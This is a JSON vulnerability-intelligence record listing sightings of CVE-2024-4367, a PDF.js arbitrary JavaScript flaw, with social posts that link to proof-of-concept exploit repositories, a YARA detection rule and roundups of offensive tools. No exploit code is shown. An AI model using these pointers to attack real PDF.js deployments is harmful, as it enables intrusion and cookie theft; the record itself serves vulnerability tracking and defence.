{"vulnerability": "CVE-2024-4367", "sightings": [{"uuid": "90f1f910-ca4f-45a5-b718-3487444bc818", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-4367", "type": "seen", "source": "https://bsky.app/profile/securitycipher.bsky.social/post/3letdul2acl2l", "content": "", "creation_timestamp": "2025-01-03T10:08:16.697339Z"}, {"uuid": "860c4d83-ff98-422b-a441-19815a707f6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://bsky.app/profile/hasegawa.bsky.social/post/3letfm3nxls2q", "content": "", "creation_timestamp": "2025-01-03T10:39:22.534770Z"}, {"uuid": "2bf6838a-22c2-4ded-bb54-f7d595d0ac48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3letfrhbngk25", "content": "", "creation_timestamp": "2025-01-03T10:42:20.121751Z"}, {"uuid": "1a54ac94-78dc-479e-b175-62646aa0a89b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://gist.github.com/EduardoCorpay/fdaeb4ec65cc4a1c8fcd2fb0162de09c", "content": "", "creation_timestamp": "2025-06-11T15:29:00.000000Z"}, {"uuid": "97f8d892-1000-4f22-91a8-264bcac60dab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://infosec.exchange/users/adulau/statuses/114575915221540133", "content": "", "creation_timestamp": "2025-05-26T20:02:03.506838Z"}, {"uuid": "c5fc8ea1-ed2c-4694-be63-66863e472af6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3lq3xqqcxdy26", "content": "", "creation_timestamp": "2025-05-26T20:02:28.845801Z"}, {"uuid": "18da794c-4c11-4fee-8516-25291fe82417", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://bsky.app/profile/adulau.infosec.exchange.ap.brid.gy/post/3lq3xqhpcodg2", "content": "", "creation_timestamp": "2025-05-26T20:03:05.248658Z"}, {"uuid": "f3263494-acc9-445e-acdf-f58a5f4a4163", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lnj3ph3k5y2t", "content": "", "creation_timestamp": "2025-04-23T21:02:24.779648Z"}, {"uuid": "3498d12b-6654-4f83-9c18-609fe0b4cf64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lj6s25vawi2f", "content": "", "creation_timestamp": "2025-02-27T21:02:06.581428Z"}, {"uuid": "3517ee15-1d7a-4a35-b040-25fb13eaa58a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3lq4mqal7ra2b", "content": "", "creation_timestamp": "2025-05-27T02:18:01.253513Z"}, {"uuid": "b77beab0-c26d-475c-8315-245e7c403027", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:27.000000Z"}, {"uuid": "5dc39f49-0faf-49a9-a3bd-3128b527f86c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7482", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThis project is intended to serve as a proof of concept to demonstrate exploiting the vulnerability in the PDF.js (pdfjs-dist) library reported in CVE-2024-4367\nURL\uff1ahttps://github.com/clarkio/pdfjs-vuln-demo\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-31T20:00:29.000000Z"}, {"uuid": "addefec8-0b53-4cb1-acb5-231e3c7a4b7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://bsky.app/profile/redteam-pentesting.de/post/3m75qw7zwu22j", "content": "", "creation_timestamp": "2025-12-04T10:23:34.008650Z"}, {"uuid": "7851680e-ffb9-41b3-aaf2-fb05d54f418f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7688", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThis project is intended to serve as a proof of concept to demonstrate exploiting the vulnerability in the PDF.js (pdfjs-dist) library reported in CVE-2024-4367\nURL\uff1ahttps://github.com/snyk-labs/pdfjs-vuln-demo\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-17T11:41:43.000000Z"}, {"uuid": "7daf1cda-921b-4cb2-b7e6-632509747a6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7356", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4367 arbitrary js execution in pdf js\nURL\uff1ahttps://github.com/s4vvysec/CVE-2024-4367-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-20T23:19:37.000000Z"}, {"uuid": "4e01cc1e-7c30-4f01-b315-d9db48dd2b2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7632", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThis project is intended to serve as a proof of concept to demonstrate exploiting the vulnerability in the PDF.js (pdfjs-dist) library reported in CVE-2024-4367\nURL\uff1ahttps://github.com/Abo5/CVE-2024-31210\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-13T00:26:55.000000Z"}, {"uuid": "7d66fbb9-e068-4997-8c8a-dafdb35c3c68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7631", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThis project is intended to serve as a proof of concept to demonstrate exploiting the vulnerability in the PDF.js (pdfjs-dist) library reported in CVE-2024-4367\nURL\uff1ahttps://github.com/Abo5/CVE-2024-27282\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-12T23:57:02.000000Z"}, {"uuid": "7bc90896-6e00-4912-a4f2-20b962591bc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/CodeReview0o0/91", "content": "#\u0646\u06af\u0627\u0647_\u0646\u0641\u0648\u0630\u06af\u0631_\u0642\u0633\u0645\u062a_9\n\u062a\u0648 \u0627\u06cc\u0646 \u0642\u0633\u0645\u062a \u062f\u0631\u0645\u0648\u0631\u062f Stored XSS \u0627\u0632 \u0637\u0631\u06cc\u0642 PDF \u0648 \u062f\u0632\u062f\u06cc\u062f\u0646 \u06a9\u0648\u06a9\u06cc \u0647\u0627 \u0635\u062d\u0628\u062a \u0645\u06cc\u06a9\u0646\u06cc\u0645 \u0648 \u0645\u06cc\u0628\u06cc\u0646\u06cc\u0645 \u0622\u06cc\u0627 \u0622\u067e\u0644\u0648\u062f \u0641\u0627\u06cc\u0644 PDF \u0645\u06cc\u062a\u0648\u0646\u0647 \u0645\u0646\u062c\u0631 \u0628\u0647 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u0634\u0647 \u06cc\u0627 \u0646\u0647.\n\n\u0644\u06cc\u0646\u06a9 \u0644\u0627\u0628\u0631\u0627\u062a\u0648\u0631 :\nhttps://github.com/maverick0o0/RealWorld-Labs/tree/main/PDF.js%20CVE\n\n\u0644\u06cc\u0646\u06a9 \u0646\u0648\u0634\u0646 : \nhttps://heady-hat-c49.notion.site/PDF-js-CVE-2024-4367-2d9db4803428805aac9ff472eb6e3c56?source=copy_link\n\n\u0648\u06cc\u062f\u06cc\u0648 :\nhttps://youtu.be/ptW0OAFAJSw", "creation_timestamp": "2026-01-01T20:49:01.000000Z"}, {"uuid": "9806d210-9516-49b8-a8ae-c1b7cdd2bafc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7350", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4367 Proof of Concept\nURL\uff1ahttps://github.com/LOURC0D3/CVE-2024-4367-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-20T10:07:13.000000Z"}, {"uuid": "831e6dab-7aee-42dc-a887-064a55532fbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7630", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThis project is intended to serve as a proof of concept to demonstrate exploiting the vulnerability in the PDF.js (pdfjs-dist) library reported in CVE-2024-4367\nURL\uff1ahttps://github.com/Abo5/CVE-2024-4484\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-12T23:13:42.000000Z"}, {"uuid": "ce859b6b-7de5-4a59-a930-a2c0e59c0074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7714", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPoC - Prueba de Concepto de CVE-2024-4367 en conjunto al CVE-2023-38831 en un solo Script\nURL\uff1ahttps://github.com/UnHackerEnCapital/PDFernetRemotelo\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-19T23:26:06.000000Z"}, {"uuid": "a1bb0df5-f147-442e-a683-424754baabb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7733", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4367\u590d\u73b0\nURL\uff1ahttps://github.com/Scivous/CVE-2024-4367-npm\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-21T08:21:24.000000Z"}, {"uuid": "9483757a-511c-4ffc-ac81-50f0ff0d550b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "cd6eba8f-a631-4b9d-a629-0d839048fa94", "vulnerability": "CVE-2024-4367", "type": "exploited", "source": "https://github.com/range42/range42-catalog/tree/main/03_container_layer/docker/_ctf/cve/web/pdfjs/CVE-2024-4367", "content": "", "creation_timestamp": "2026-04-15T14:28:37.394034Z"}, {"uuid": "88394c2e-5c99-4c5a-b437-245e000e6864", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/cKure/12986", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 CVE-2024-4367 \u2013 Arbitrary JavaScript execution in PDF.js\n\nhttps://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js/", "creation_timestamp": "2024-05-27T13:01:33.000000Z"}, {"uuid": "a9f957a8-266e-4e44-be27-61f15f7beef8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "Telegram/NJ9nHeSjyVBN7SBgXLMvf-DAwTl6GvA0rPQzg42RPYkN4sg", "content": "", "creation_timestamp": "2025-08-25T15:00:05.000000Z"}, {"uuid": "c3f4524c-2e98-4d0c-af90-5a617cd9a644", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "Telegram/BLETgmSECdsELe7SiMMG7bms6BodEHzI5VKt2H9vRFj39-4", "content": "", "creation_timestamp": "2025-08-03T21:00:04.000000Z"}, {"uuid": "16038423-fc2a-40d6-b74b-8746e9b8d50c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7379", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aYARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js\nURL\uff1ahttps://github.com/spaceraccoon/detect-cve-2024-4367\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-22T18:09:50.000000Z"}, {"uuid": "effa9950-aac8-4f57-af1c-c3b508db82b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "Telegram/_mb04GQDFMkSUEvLmFP_krYJPEj6Asa4dl-z5xHAcnkVfA", "content": "", "creation_timestamp": "2024-05-21T16:24:54.000000Z"}, {"uuid": "b6b0330a-c188-44f3-bddf-e2fe3d663a57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "Telegram/VhjljfNhkzy27MAclYG8_ZdWA3MFufdW11JFY0LnzdcUII0", "content": "", "creation_timestamp": "2025-06-28T21:00:04.000000Z"}, {"uuid": "24679c6b-62db-4669-b528-6804446e93dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/Kelvinseccommunity/538", "content": "https://github.com/rzte/pdf-exploit\n\npdf exploit \u96c6\u6210 \uff08CVE-2024-4367\uff09\n#github #exploit #tools", "creation_timestamp": "2024-07-14T12:19:38.000000Z"}, {"uuid": "e82f651e-5bb4-447d-bf8b-f03c103a0570", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/218", "content": "CVE-2024-4367-Arbitrary JavaScript Execution in PDF.JS\n\n- Built -in ranger in Firefox\n-node.js module pdfjs-dist\n- Sites with PDF pre -examination\n- Applications on Electron.\n\nAnd a bunch of places where you can operate XSS or RCE (in the case of Electron under certain conditions), in PDF.js.\n\nPOC: https://github.com/lourc0d3/cve-2024-4367-poc\n\nRESPER: https://codeanlabs.com/blog/research/cve-2024-4367-arry-js-js-in-pdf-js\n\ud83d\udcda ZeroEthical Course \ud83d\udc8e", "creation_timestamp": "2024-05-26T23:10:20.000000Z"}, {"uuid": "605dbc95-93bf-4a34-979f-3fb336ffa18d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/203", "content": "#exploit\n1. CVE-2024-32113:\nApache OFBiz Directory Traversal\nhttps://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit\n\n2. CVE-2024-4367:\nArbitrary JavaScript execution in PDF.js\nhttps://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js\n\n3. CVE-2024-33559:\nWordPress Theme XStore 9.3.8 - SQLi\nhttps://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection\n\n\ud83d\udcda ZeroEthical Course \ud83d\udc8e", "creation_timestamp": "2024-05-24T03:20:53.000000Z"}, {"uuid": "a0e83ffe-0347-4f9d-a932-4bcfb8fc862f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/13053", "content": "https://github.com/rzte/pdf-exploit\n\npdf exploit \u96c6\u6210 \uff08CVE-2024-4367\uff09\n#exploit", "creation_timestamp": "2024-07-14T17:12:32.000000Z"}, {"uuid": "f55891e9-773c-4ef0-838b-a6d4ea4d8757", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/368", "content": "\ud83d\udea8POC RELEASED\ud83d\udea8PoC for CVE-2024-4367 & CVE-2024-34342: Arbitrary JavaScript execution in PDF.js\n\n#DarkWeb #Cybersecurity #Security #Cyberattack #Cybercrime #Privacy #Infosec #CVE20244367 #CVE202434342 #Vulnerability \n\nhttps://x.com/DarkWebInformer/status/1793295146588459283", "creation_timestamp": "2024-05-22T18:12:14.000000Z"}, {"uuid": "31f9bb6b-470b-4725-aabe-fca74243a7a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1260", "content": "https://github.com/rzte/pdf-exploit\n\npdf exploit \u96c6\u6210 \uff08CVE-2024-4367\uff09\n#exploit", "creation_timestamp": "2024-07-14T17:12:32.000000Z"}, {"uuid": "b4488c68-ca8d-493a-a2dc-863164ed68ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/lcmysecteamch/4430", "content": "Tools - Hackers Factory\n\nCross Site Scripting ( XSS ) Vulnerability Payload List \n\nhttps://github.com/payloadbox/xss-payload-list\n\nYARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js \n\nhttps://github.com/spaceraccoon/detect-cve-2024-4367\n\nThe Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit. \n\nhttps://github.com/0xInfection/XSRFProbe\n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nAutomation for javascript recon in bug bounty. \n\nhttps://github.com/KathanP19/JSFScan.sh\n\nTempMail is a simple web application that allows you to generate temporary email addresses and view the emails received by these addresses. \n\nhttps://github.com/mehmetkahya0/temp-mail \n\nThis Repositories contains list of One Liners with Descriptions and Installation requirements \n\nhttps://github.com/thecybertix/One-Liner-Collections\n\nAutomatic SSRF fuzzer and exploitation tool \n\nhttps://github.com/swisskyrepo/SSRFmap\n\nA tool to fastly get all javascript sources/files \n\nhttps://github.com/003random/getJS\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nInQL is a robust, open-source Burp Suite extension for advanced GraphQL testing, offering intuitive vulnerability detection, customizable scans, and seamless Burp integration. \n\nhttps://github.com/doyensec/inql\n\n#HackersFactory", "creation_timestamp": "2024-05-25T15:33:16.000000Z"}, {"uuid": "c221c612-d660-4a52-a11f-be4b7140aba3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://t.me/HackingInsights/6029", "content": "\u200aFabasoft Tackles PDF.js Vulnerability (CVE-2024-4367), Safeguarding eGovernment and Enterprise Search Solutions\n\nhttps://securityonline.info/fabasoft-tackles-pdf-js-vulnerability-cve-2024-4367-safeguarding-egovernment-and-enterprise-search-solutions/", "creation_timestamp": "2024-07-14T12:38:47.000000Z"}, {"uuid": "13374973-3620-4ef1-9343-29ccbd30e14d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/425", "content": "Tools - Hackers Factory \n\nBloodHoundAD/BARK: BloodHound Attack Research Kit''\n\nhttps://github.com/BloodHoundAD/BARK\n\nCreate yourself #exp of CVE-2024-4367: PDF.js\n\nhttps://github.com/rzte/pdf-exploit\n\nCVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\n''GitHub - erebe/wstunnel: Tunnel all your traffic over Websocket or HTTP2 - Bypass firewalls/DPI - Static binary available''\n\nhttps://github.com/erebe/wstunnel\n\nOctoberfest7/MemFiles: A CobaltStrike toolkit to write files produced by Beacon to memory instead of disk''\n\nhttps://github.com/Octoberfest7/MemFiles\n\nelastic/SWAT: Simple Workspace Attack Tool (SWAT) is a tool for simulating malicious behavior against Google Workspace in reference to the MITRE ATT&CK framework.''\n\nhttps://github.com/elastic/SWAT\n\npmatula/Windows-Internals-Learning-Resources\n\nhttps://github.com/pmatula/Windows-Internals-Learning-Resources\n\nIntegration-IT/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.''\n\nhttps://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet\n\n0xEr3bus/RdpStrike: Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP.''\n\nhttps://github.com/0xEr3bus/RdpStrike\n\nwh0amitz/SharpADWS: Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS).''\n\nhttps://github.com/wh0amitz/SharpADWS\n\nsrlabs/Certiception: An ADCS honeypot to catch attackers in your internal network.''\n\nhttps://github.com/srlabs/Certiception\n\nmertdas/SharpIncrease: A Tool that aims to evade av with binary padding''\n\nhttps://github.com/mertdas/SharpIncrease\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-18T08:55:28.000000Z"}, {"uuid": "9b59ebbb-938a-4ba0-972f-f2d6674a28be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/173", "content": "\u200aCVE-2024-4367 & CVE-2024-34342: JavaScript Flaws Threaten Millions of PDF.js and React-PDF Users\n\nhttps://securityonline.info/cve-2024-4367-cve-2024-34342-javascript-flaw-threatens-millions-of-pdf-js-and-react-pdf-users/", "creation_timestamp": "2024-05-08T11:25:59.000000Z"}, {"uuid": "9be64984-d6d2-41f7-9db0-7fae8581b23b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/155", "content": "Tools - Hackers Factory\n\nCross Site Scripting ( XSS ) Vulnerability Payload List \n\nhttps://github.com/payloadbox/xss-payload-list\n\nYARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js \n\nhttps://github.com/spaceraccoon/detect-cve-2024-4367\n\nThe Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit. \n\nhttps://github.com/0xInfection/XSRFProbe\n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nAutomation for javascript recon in bug bounty. \n\nhttps://github.com/KathanP19/JSFScan.sh\n\nTempMail is a simple web application that allows you to generate temporary email addresses and view the emails received by these addresses. \n\nhttps://github.com/mehmetkahya0/temp-mail \n\nThis Repositories contains list of One Liners with Descriptions and Installation requirements \n\nhttps://github.com/thecybertix/One-Liner-Collections\n\nAutomatic SSRF fuzzer and exploitation tool \n\nhttps://github.com/swisskyrepo/SSRFmap\n\nA tool to fastly get all javascript sources/files \n\nhttps://github.com/003random/getJS\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nInQL is a robust, open-source Burp Suite extension for advanced GraphQL testing, offering intuitive vulnerability detection, customizable scans, and seamless Burp integration. \n\nhttps://github.com/doyensec/inql\n\n#HackersFactory", "creation_timestamp": "2024-06-17T14:00:55.000000Z"}, {"uuid": "68280262-f0e3-423e-94b9-52a83be877b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "Telegram/YHR5LDl8bCoziN9wxHaTi6ArVs3jBR0B5N7TdotJGSgguKs", "content": "", "creation_timestamp": "2025-04-12T11:00:06.000000Z"}, {"uuid": "1b1818b0-bbf2-4ec9-bcd3-4f0a15ba44b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "Telegram/3WDKzCztn6fhsFP0h502IW0gqJijz_QXvsQbayWM_ehdyuQ", "content": "", "creation_timestamp": "2025-04-14T05:00:07.000000Z"}, {"uuid": "6cba2c54-c30d-44bc-8058-aca7c9d08a3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8264", "content": "Tools - Hackers Factory \n\nBloodHoundAD/BARK: BloodHound Attack Research Kit''\n\nhttps://github.com/BloodHoundAD/BARK\n\nCreate yourself #exp of CVE-2024-4367: PDF.js\n\nhttps://github.com/rzte/pdf-exploit\n\nCVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\n''GitHub - erebe/wstunnel: Tunnel all your traffic over Websocket or HTTP2 - Bypass 